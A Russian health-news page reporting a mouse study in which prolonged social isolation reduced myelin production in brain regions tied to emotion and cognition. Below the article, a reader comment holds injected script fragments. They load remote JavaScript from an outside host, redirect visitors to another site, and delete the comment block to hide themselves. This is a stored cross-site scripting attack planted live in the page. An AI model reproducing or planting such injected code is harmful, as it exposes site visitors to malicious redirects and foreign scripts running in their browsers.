Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Отсутствие общения высуши...  >>  Отсутствие общения высушивает нервы
 
Обратная связь
 

Отсутствие общения высушивает нервы

Размер шрифта
17 декабря 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

В эксперименте на животных американские ученые установили, что длительная социальная изоляция приводит к уменьшению количества миелина в головном мозге.

отсутствие общения высушивает нервы

Миелин представляет собой вещество, которое формирует миелиновую оболочку. Миелиновая оболочка покрывает длинные отростки нейронов (аксоны) и обеспечивает проведение электрического импульса. Если миелин разрушается, как это происходит при демиелинизирующих заболеваниях, в частности при рассеянном склерозе, проведение импульса нарушается.

Суть исследования

В ходе эксперимента взрослых мышей изолировали друг от друга на 8 недель, чтобы спровоцировать у них депрессивное состояние. Затем к каждой мыши подселяли мышь, с которой они раньше не встречались. Несмотря на то, что мыши являются социальными животными, после изоляции они не проявляли интереса к особи своего вида, что является моделью социального отчуждения.

При изучении головного мозга мышей, которые находились в социальной изоляции, ученые обнаружили изменения в особых клетках, отвечающих за выработку миелина – олигодендроцитах. Однако изменения выявлены не во всех клетках, а только в тех зонах коры головного мозга, которые отвечают за эмоциональное и когнитивное поведение.

Следует отметить, что после окончания периода социальной изоляции, выработка миелина возвращалась на прежний уровень. Таким образом, головной мозг реагирует на меняющиеся условия окружающей среды, причем в этом процессе участвуют не только нейроны, как считалось ранее.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Открытие в науке: обнаружен белок, восстанавливающий нервы   Ученые научились стирать память   Отсутствие оргазма и другие признаки диабета, которые вы игнорируете!   Как магнитная буря влияет на ваше здоровье?  
25 января 2013Обезьян научили определять время без часов 14 декабря 2012Отсутствие общения высушивает нервы
 
31 октября 2012Ученые научились стирать память! 02 июля 2013Лечить головную боль можно без лекарств! Ученые подключают электричество к нервам!
 

Слайдшоу

1
Супереда от Паркинсона
Что скрывает головная боль
Что вы знаете о шизофрении?

Тесты

Вредит ли здоровью ваш мобильный?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.